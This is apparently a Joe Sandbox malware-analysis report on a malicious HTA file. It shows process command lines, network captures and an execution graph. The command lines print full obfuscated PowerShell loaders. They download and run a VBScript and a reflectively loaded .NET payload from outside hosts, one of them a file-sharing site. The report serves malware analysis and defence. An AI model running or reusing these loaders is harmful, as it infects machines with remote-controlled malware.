                                                                      Nov 28, 2024 18:50:24.269599915 CET1236INData Raw: 00 0d 00 0a 00 73 00 78 00 68 00 47 00 74 00 6d 00 4c 00 69 00 49 00 6b 00 70 00 4c 00 4b 00 43 00 57 00 20 00 3d 00 20 00 22 00 4e 00 6b 00 50 00 7a 00 50 00 76 00 68 00 7a 00 4a 00 63 00 57 00 52 00 61 00 6f 00 4f 00 22 00 0d 00 0a 00 4b 00 48
                                                                      Data Ascii: sxhGtmLiIkpLKCW = "NkPzPvhzJcWRaoO"KHlinUmciLLWGlz = "hGKWckAmsIaUhnc"lnzlUtfuBNuQLrL = "KkRismLZiAbLQiz"zWmfONfd
                                                                      Nov 28, 2024 18:50:24.269612074 CET1236INData Raw: 00 6e 00 64 00 71 00 5a 00 66 00 43 00 20 00 3d 00 20 00 22 00 61 00 4b 00 49 00 71 00 57 00 64 00 6d 00 64 00 4c 00 47 00 69 00 6b 00 70 00 68 00 61 00 22 00 0d 00 0a 00 6b 00 5a 00 51 00 69 00 4b 00 70 00 75 00 51 00 51 00 49 00 4b 00 4b 00 75
                                                                      Data Ascii: ndqZfC = "aKIqWdmdLGikpha"kZQiKpuQQIKKuWx = "qoKTpWLdkpeuPCC"dfcCixUlBqCfiPA = "dhNBqRpiqWNifkL"kemGLheOPxQUoiU = "
                                                                      Nov 28, 2024 18:50:24.269623995 CET1236INData Raw: 00 61 00 62 00 57 00 4b 00 47 00 57 00 65 00 4b 00 43 00 65 00 4f 00 52 00 22 00 0d 00 0a 00 4c 00 62 00 7a 00 4c 00 4c 00 4e 00 6d 00 50 00 50 00 50 00 4b 00 47 00 43 00 50 00 4c 00 20 00 3d 00 20 00 22 00 6b 00 4c 00 74 00 57 00 57 00 52 00 73
                                                                      Data Ascii: abWKGWeKCeOR"LbzLLNmPPPKGCPL = "kLtWWRsKtWWZAkq"LkLmIcLPfKkLKUK = "NfWWarauUpiWJct"mRzmQZKGLbOPCib = "QeWeWiPPBWWWo
                                                                      Nov 28, 2024 18:50:24.393755913 CET1236INData Raw: 00 41 00 57 00 65 00 50 00 68 00 4b 00 55 00 6e 00 20 00 3d 00 20 00 22 00 65 00 57 00 47 00 47 00 57 00 4e 00 57 00 62 00 6c 00 43 00 47 00 62 00 66 00 6d 00 62 00 22 00 0d 00 0a 00 75 00 70 00 78 00 4c 00 55 00 4f 00 55 00 57 00 4c 00 47 00 43
                                                                      Data Ascii: AWePhKUn = "eWGGWNWblCGbfmb"upxLUOUWLGCLvRZ = "KzWWvkmLhNeWnmz"bNmLLKBRafTbbkW = "LKmZkmoCkkoLZcW"zkLkCLLLWiZtTiW =


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449731193.30.119.2054437864C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-28 17:50:32 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                      Host: 3105.filemail.com
                                                                      Connection: Keep-Alive
                                                                      2024-11-28 17:50:32 UTC225INHTTP/1.1 401 Unauthorized
                                                                      Cache-Control: no-cache,no-store
                                                                      Pragma: no-cache
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: application/json; charset=utf-8
                                                                      Expires: -1
                                                                      Date: Thu, 28 Nov 2024 17:50:31 GMT
                                                                      Connection: close
                                                                      2024-11-28 17:50:32 UTC300INData Raw: 31 32 35 0d 0a 7b 22 76 61 6c 69 64 61 74 69 6f 6e 65 72 72 6f 72 73 22 3a 5b 7b 22 50 72 6f 70 65 72 74 79 4e 61 6d 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 22 2c 22 45 72 72 6f 72 43 6f 64 65 22 3a 22 41 63 63 65 73 73 44 65 6e 69 65 64 22 2c 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 74 72 61 6e 73 66 65 72 20 69 73 20 64 69 73 61 62 6c 65 64 22 7d 5d 2c 22 72 65 73 70 6f 6e 73 65 73 74 61 74 75 73 22 3a 22 41 63 63 65 73 73 44 65 6e 69 65 64 22 2c 22 65 72 72 6f 72 69 64 22 3a 22 33 35 32 31 62 63 65 31 2d 39 32 35 31 2d 34 66 66 63 2d 38 63 39 38 2d 37 38 32 62 36 35 65 65 63 31 62 32 22 2c 22 65 72 72 6f 72 6d 65 73 73 61 67 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 20 2d 2d 3e 20 5b 41 63 63 65 73 73 44 65 6e 69 65 64 5d 20 54
                                                                      Data Ascii: 125{"validationerrors":[{"PropertyName":"transferid","ErrorCode":"AccessDenied","ErrorMessage":"This transfer is disabled"}],"responsestatus":"AccessDenied","errorid":"3521bce1-9251-4ffc-8c98-782b65eec1b2","errormessage":"transferid --> [AccessDenied] T
                                                                      2024-11-28 17:50:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:12:50:18
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\seemebestthings.hta"
                                                                      Imagebase:0x910000
                                                                      File size:13'312 bytes
                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:12:50:18
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:12:50:18
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:12:50:19
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
                                                                      Imagebase:0xde0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:12:50:21
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline"
                                                                      Imagebase:0x950000
                                                                      File size:2'141'552 bytes
                                                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:12:50:21
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C55.tmp" "c:\Users\user\AppData\Local\Temp\dk54el2n\CSC71BE0DF5A47E408EAC9C81C5574F338.TMP"
                                                                      Imagebase:0x170000
                                                                      File size:46'832 bytes
                                                                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:12:50:27
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
                                                                      Imagebase:0x2b0000
                                                                      File size:147'456 bytes
                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:12:50:28
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                      Imagebase:0xde0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:12:50:28
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0xb60000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:12:50:28
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
                                                                      Imagebase:0xde0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Reset < >
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.1692862142.0000000006580000.00000010.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_6580000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                        • Instruction ID: 8b866caceb2ec23d22a5ae2002c600aaa5d7ae9759ac92a3ba8a56eabe92bc21
                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                        • Instruction Fuzzy Hash:
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.1692862142.0000000006580000.00000010.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_6580000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                        • Instruction ID: 8b866caceb2ec23d22a5ae2002c600aaa5d7ae9759ac92a3ba8a56eabe92bc21
                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                        • Instruction Fuzzy Hash:
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.1692862142.0000000006580000.00000010.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_6580000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                        • Instruction ID: 8b866caceb2ec23d22a5ae2002c600aaa5d7ae9759ac92a3ba8a56eabe92bc21
                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                        • Instruction Fuzzy Hash:
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.1692862142.0000000006580000.00000010.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_6580000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                        • Instruction ID: 8b866caceb2ec23d22a5ae2002c600aaa5d7ae9759ac92a3ba8a56eabe92bc21
                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                        • Instruction Fuzzy Hash:

                                                                        Execution Graph

                                                                        Execution Coverage:2.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:17%
                                                                        Total number of Nodes:47
                                                                        Total number of Limit Nodes:6
                                                                        execution_graph 12940 4ba763f 12941 4ba75da 12940->12941 12942 4ba764b 12940->12942 12948 4ba7da8 12941->12948 12952 4ba7c45 12941->12952 12960 4ba7a08 12941->12960 12969 4ba7a18 12941->12969 12943 4ba75df 12949 4ba7cf9 12948->12949 12949->12948 12978 75e45f3 12949->12978 12986 75e4610 12949->12986 12953 4ba7b9a 12952->12953 12957 4ba7c5e 12952->12957 12953->12952 12954 4ba7de8 URLDownloadToFileW 12953->12954 12956 4ba7ea8 12954->12956 12956->12943 12958 75e45f3 3 API calls 12957->12958 12959 75e4610 3 API calls 12957->12959 12958->12957 12959->12957 12961 4ba7a4c 12960->12961 12962 4ba7b30 12961->12962 12963 4ba7de8 URLDownloadToFileW 12961->12963 12966 4ba7c5e 12961->12966 12962->12943 12965 4ba7ea8 12963->12965 12965->12943 12967 75e45f3 3 API calls 12966->12967 12968 75e4610 3 API calls 12966->12968 12967->12966 12968->12966 12970 4ba7a4c 12969->12970 12971 4ba7b30 12970->12971 12972 4ba7de8 URLDownloadToFileW 12970->12972 12975 4ba7c5e 12970->12975 12971->12943 12974 4ba7ea8 12972->12974 12974->12943 12976 75e45f3 3 API calls 12975->12976 12977 75e4610 3 API calls 12975->12977 12976->12975 12977->12975 12980 75e4610 12978->12980 12979 75e4a93 12979->12949 12980->12979 12982 4ba7a18 4 API calls 12980->12982 12983 4ba7a08 4 API calls 12980->12983 12985 4ba7c45 4 API calls 12980->12985 12994 4ba1bf8 12980->12994 12981 75e4a34 12981->12949 12982->12981 12983->12981 12985->12981 12987 75e4a93 12986->12987 12988 75e4641 12986->12988 12987->12949 12988->12987 12990 4ba7a18 4 API calls 12988->12990 12991 4ba7a08 4 API calls 12988->12991 12992 4ba1bf8 URLDownloadToFileW 12988->12992 12993 4ba7c45 4 API calls 12988->12993 12989 75e4a34 12989->12949 12990->12989 12991->12989 12992->12989 12993->12989 12995 4ba7e00 URLDownloadToFileW 12994->12995 12997 4ba7ea8 12995->12997 12997->12981

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
